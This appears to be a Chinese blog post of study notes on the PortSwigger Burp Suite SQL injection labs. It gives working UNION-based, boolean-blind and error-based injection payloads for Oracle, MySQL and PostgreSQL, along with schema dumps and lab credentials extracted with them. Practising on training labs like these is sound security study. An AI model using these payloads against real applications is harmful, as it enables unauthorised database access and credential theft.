首页 > 其他分享 >burpsuite靶场

burpsuite靶场

时间:2023-10-24 16:22:27浏览次数:31  
标签:tables stat burpsuite user --+ 靶场 select pg

xx'--

sql语句中可能有 and released = 1,因为数据库把有的数据隐藏了

xx'+or+1=1--

查询所有

username='xx'--' and password=''

颠覆逻辑

'union select xxx--

检索数据库中数据

SELECT * FROM v$version

检索数据库信息

ctrl+u:url编码

SQL injection attack, querying the database type and version on Oracle

' union select 'a',banner from sys.v_$version--+

SQL injection attack, querying the database type and version on MySQL and Microsoft

?category=Lifestyle' union select 'a',version()--+

SQL injection attack, listing the database contents on non-Oracle databases

' order by 2--+

' union select 'a',version()--+

=>PostgreSQL 12.14 (Ubuntu 12.14-0ubuntu0.20.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, 64-bit

' union select 'a',schema_name from information_schema.schemata--+

=>

'a' schema_name
a information_schema
a public
a pg_catalog

' union select 'a',table_name from information_schema.tables where table_schema='pg_catalog'--+

=>

pg_ts_config_map
pg_constraint
pg_tablespace
pg_stat_bgwriter
pg_stat_xact_user_functions
pg_policy
pg_available_extensions
pg_stat_user_tables
pg_stat_wal_receiver
pg_enum
pg_sequence
pg_stat_progress_create_index
pg_tables
pg_user_mappings
pg_seclabels
pg_auth_members
pg_stats_ext
pg_statio_sys_indexes
pg_prepared_xacts
pg_views
pg_user
pg_stat_xact_sys_tables
pg_sequences
pg_rewrite
pg_subscription
pg_stat_all_indexes
pg_shdescription
pg_stat_gssapi
pg_indexes
pg_statio_user_sequences
pg_stat_archiver
pg_ts_template
pg_timezone_names
pg_foreign_server
pg_type
pg_statio_user_tables
pg_pltemplate
pg_stat_activity
pg_ts_dict
pg_ts_parser
pg_extension
pg_language
pg_group
pg_statio_user_indexes
pg_amop
pg_policies
pg_replication_slots
pg_database
pg_shdepend
pg_publication
pg_db_role_setting
pg_prepared_statements
pg_stat_database_conflicts
pg_stat_database
pg_stat_replication
pg_stat_xact_user_tables
pg_statio_sys_sequences
pg_stat_user_functions
pg_cast
pg_statio_all_tables
pg_ts_config
pg_shseclabel
pg_depend
pg_stat_all_tables
pg_attrdef
pg_replication_origin
pg_amproc
pg_matviews
pg_statio_sys_tables
pg_event_trigger
pg_partitioned_table
pg_am
pg_largeobject_metadata
pg_collation
pg_statistic_ext
pg_class
pg_foreign_data_wrapper
pg_conversion
pg_locks
pg_stat_sys_tables
pg_rules
pg_index
pg_statio_all_indexes
pg_namespace
pg_stat_subscription
pg_publication_rel
pg_operator
pg_stat_xact_all_tables
pg_opfamily
pg_description
pg_stats
pg_stat_user_indexes
pg_opclass
pg_range
pg_inherits
pg_stat_sys_indexes
pg_stat_progress_vacuum
pg_available_extension_versions
pg_cursors
pg_aggregate
pg_statio_all_sequences
pg_settings
pg_attribute
pg_stat_progress_cluster
pg_foreign_table
pg_init_privs
pg_stat_ssl
pg_transform
pg_timezone_abbrevs
pg_default_acl
pg_trigger
pg_roles

' union select 'a',column_name from information_schema.columns where table_name='pg_user'--+

用burpsuite的intruder模块批量查表

得到可能得表pg_roles

=>pg_roles:rolname,rolpassword

错了,数据库搞错了

搜表的时候就不该指定数据库,直接搜所有

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

users_lzuqsm

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_lzuqsm'--

username_hpqlna

password_wwanrb

'+UNION+SELECT+username_hpqlna,+password_wwanrb+FROM+users_lzuqsm--
username password
wiener u0djyjuuupomqcyi17qn
administrator hpryjdd0jnp1if96pb8h

SQL injection attack, listing the database contents on Oracle

' union select table_name,null from all_tables--+

表名:USERS_LMQRSC

' union select column_name,null from all_tab_columns where table_name='USERS_LMQRSC'--+

列名:PASSWORD_TZEGWA USERNAME_GWTBKN

' union select USERNAME_GWTBKN,PASSWORD_TZEGWA from USERS_LMQRSC--+
用户名 密码
administrator p1dqqm7fsg5c3pd9rds8

all_tables为存表名的表

all_tab_columns为存表名和列名的表

Blind SQL injection with conditional responses

cookie注入:请求的cookie 若数据库中已存在,则返回welcome back,不存在则不返回welcome back

Cookie: TrackingId=zE4fYn2IqMbic6HN' and 1=1--; session=nLV9bknvkhGTOrDyqI1nksB6uG2p8JWy
' and (select 'a' from users)='a'--

存在表user

' and (select 'a' from users where username='administrator')='a'--

user中存在用户administrator

' and (select 'a' from users where username='administrator' and length(password)>1)='a'--

从1开始,判断password位数,为20

' and (select substring(password,1,1) from users where username='administrator')='a'--

用intruder爆破,由于有两个参数要变,使用Cluster bomb

密码为zb7woiar9rmdzfcimmk3

Blind SQL injection with conditional errors

报错注入:cookie可注入,且cookie有错的时候会报错

Cookie: TrackingId=zPiORxXsaSfDbOIc'

报错,且500,说明是后端错误

Cookie: TrackingId=zPiORxXsaSfDbOIc''

不报错,说明这里的可以影响输出

' union select ''--+

加入一个正确的sql语句,显示报错,可能是oracle数据库

' union select '' from dual--+
或' and (select 'a' from dual)='a'--+

输出正常页面,说明是个oracle数据库,且此处与数据库交互

' and (select 'a' from users where rownum=1)='a'--+

表示user表存在

疑问:为什么此处查dual表不用rownum,查user必须用?而且加了查询子句where之后,也不用rownum了

' and (select 'a' from users where username='administrator')='a'--

标签:tables,stat,burpsuite,user,--+,靶场,select,pg
From: https://www.cnblogs.com/xyday/p/17785103.html

相关文章

  • docker搭建网安靶场教程
    Docker拉取靶场环境docker是一个很好用的容器服务,它相当于在你的虚拟机中生成无数个容器,可以供开发人员使用,假设一个环境,如果你想搭建网安靶场环境供自己练习,那么常规情况下你就要去VM里开环境自己搭建,这样是非常慢的,不如使用docker服务,而且还可以上网上拉取自己想要的镜像,同样......
  • BurpSuite Extensions
    BurpSuite是一款功能强大的Web应用程序安全测试工具,除了本身自带的强大功能模块之外,可支持自定义拓展的插件可以帮助一众安全人员更好地识别、发现潜在的风险项目,而插件本身的定制扩展了BurpSuite的功能,使得工具的可扩展性变得强大无比的同时,让很多重复性很高、自动化需求很强烈......
  • 【靶场部署】docker搭建sqli-labs
    1、声明本文所介绍的内容仅用于学习和交流,严禁利用文中技术进行非法行为。由于传播、利用本文所提供的信息和技术而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。2、sqli-labs介绍sqli-labs是一个开源且非常有学习价值的SQL注入靶场,基本......
  • sqli靶场通关流程23~32关
    sqli靶场通关流程23~32关Less-23GET-Errorbased-stripcomments(基于错误的,过滤注释的GET型)首先,我们通过输入1’unionselect1,2,database()--+发现结尾提示少了一个单引号我们再尝试输入联合查询语句?id='unionselect1,2,database()'看看能不能爆库,发现直接爆......
  • burpsuite靶场----目录遍历----00截断(后缀名限制)
    burpsuite靶场----目录遍历----00截断(后缀名限制)靶场地址https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass正式开始1.随便打开一个图片2.00截断原理:url框默认会进行一次url解码,%00会被解码为null,在从左向右......
  • burpsuite靶场----目录遍历----斜杠双重url编码绕过
    burpsuite靶场----目录遍历----斜杠双重url编码绕过靶场地址https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode正式开始1.随便打开一个图片2.对'/'进行双重url编码,即为%252f,然后访问..%252f..%252f..%252fetc/passwd3.在bp中可以查......
  • burpsuite靶场----目录遍历----复写绕过
    burpsuite靶场----目录遍历----复写绕过靶场地址https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively正式开始1.查看图片2.测试./../../../etc/passwd和/etc/passwd都失败了猜测是过滤了'../'采用复写绕过....//....//..........
  • burpsuite靶场----目录遍历----无防御
    burpsuite靶场----目录遍历----无防御靶场地址https://portswigger.net/web-security/file-path-traversal/lab-simple正式开始1.随便打开一个图像2.在filename处可以filename=./../../../../etc/passwd3.然后可以通过bp看到目录遍历的内容......
  • burpsuite靶场----目录遍历----绝对路径
    burpsuite靶场----目录遍历----绝对路径靶场地址https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass正式开始1.随便打开一个图片2.然后filename先尝试./../../../../etc/passwd不行然后再尝试/etc/passed成功......
  • burpsuite靶场----CSRF----token验证取决于其是否存在
    burpsuite靶场----CSRF----token验证取决于其是否存在靶场地址https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-token-being-present正式开始1.登录2.抓包,发现有token3.删掉这个csrf参数,发现无影响但是如果换......